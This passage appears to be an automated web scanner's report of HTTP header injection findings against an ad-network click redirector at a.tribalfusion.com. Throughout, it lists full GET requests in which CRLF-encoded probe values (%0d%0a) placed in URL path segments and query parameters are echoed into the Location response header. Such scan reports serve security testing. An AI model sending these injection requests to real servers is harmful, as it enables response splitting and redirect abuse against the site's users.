GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/52493%0d%0a224473ccc99/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 16 is copied into the Location response header. The payload 2b2bd%0d%0ad6cedd4809c was submitted in the REST URL parameter 16. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/2b2bd%0d%0ad6cedd4809c/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 17 is copied into the Location response header. The payload 99dde%0d%0a3eec990608a was submitted in the REST URL parameter 17. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/99dde%0d%0a3eec990608a/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 18 is copied into the Location response header. The payload 10f5a%0d%0a7f475f239a3 was submitted in the REST URL parameter 18. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/10f5a%0d%0a7f475f239a3/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 19 is copied into the Location response header. The payload 6077c%0d%0a81e460d100 was submitted in the REST URL parameter 19. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/6077c%0d%0a81e460d100 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 3 is copied into the Location response header. The payload 316e2%0d%0af3f106cb4ed was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/316e2%0d%0af3f106cb4ed/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 4 is copied into the Location response header. The payload 6ef98%0d%0adf03781253c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/6ef98%0d%0adf03781253c/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 5 is copied into the Location response header. The payload e29cc%0d%0a7ba6994efad was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/e29cc%0d%0a7ba6994efad/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 6 is copied into the Location response header. The payload 3a728%0d%0a6b904cbb811 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/3a728%0d%0a6b904cbb811/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 7 is copied into the Location response header. The payload 7265f%0d%0a8acca6d500f was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/7265f%0d%0a8acca6d500f/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 8 is copied into the Location response header. The payload 9300b%0d%0a0bad28ce6f1 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/9300b%0d%0a0bad28ce6f1/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 9 is copied into the Location response header. The payload 64110%0d%0a7baeb896275 was submitted in the REST URL parameter 9. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/64110%0d%0a7baeb896275/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr request parameter is copied into the Location response header. The payload 7f89d%0d%0a3c0d66486b9 was submitted in the http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr=7f89d%0d%0a3c0d66486b9 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
3.53. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 360e7%0d%0ab239a5c1971 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?360e7%0d%0ab239a5c1971=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 